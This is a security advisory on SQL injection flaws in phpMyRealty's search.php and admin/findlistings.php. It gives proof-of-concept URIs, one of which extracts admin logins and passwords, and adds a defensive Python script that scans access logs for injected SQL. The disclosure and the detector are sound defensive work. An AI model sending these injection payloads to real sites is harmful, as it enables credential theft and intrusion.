phpMyRealty Multiple SQL Injection Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available for these issues:

http://www.example.com/search.php?type=-1+union+select+concat_ws(char(58),login,password)+from+pmr_admins
http://www.example.com/admin/findlistings.php?listing_updated=YES&listing_updated_days=1)+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4/*
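Both URIs place SQL in a parameter that would otherwise hold a number, so web-server logs can be checked for requests of that shape. The script below is an added example, not part of the advisory or of phpMyRealty. It assumes that `type` and `listing_updated_days` carry non-negative integers in normal use and that the logs are in combined log format. The log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters named in the advisory's proof-of-concept URIs, keyed by script.
# Assumption: both hold plain non-negative integers in legitimate requests.
WATCHED = {
    "search.php": {"type"},
    "findlistings.php": {"listing_updated_days"},
}
INTEGER = re.compile(r"\d+")
SQL_TOKENS = re.compile(r"\b(union|select|from|concat_ws|char)\b|/\*|--", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def inspect_line(line):
    """Return (script, param, value, severity) findings for one log line."""
    match = REQUEST.search(line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    script = url.path.rsplit("/", 1)[-1]
    findings = []
    # parse_qsl percent-decodes and maps '+' to a space, as PHP does.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name not in WATCHED.get(script, ()):
            continue
        if INTEGER.fullmatch(value):
            continue  # matches the expected integer form
        severity = "high" if SQL_TOKENS.search(value) else "review"
        findings.append((script, name, value, severity))
    return findings


# Constructed sample access-log lines (not captured traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /search.php?type=2 HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /search.php?type=-1+union+select+1 HTTP/1.1" 200 733',
    '192.0.2.12 - - [01/Jan/2010:10:00:09 +0000] "GET /admin/findlistings.php?listing_updated=YES'
    '&listing_updated_days=1)%20UNION%20SELECT%201/* HTTP/1.1" 200 901',
    '192.0.2.13 - - [01/Jan/2010:10:00:12 +0000] "GET /search.php?type=abc HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        for finding in inspect_line(entry):
            print(finding)
```

A "review" finding is a non-integer value with no SQL token; a "high" finding also contains a SQL keyword or comment marker.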


 

Copyright 2010, SecurityFocus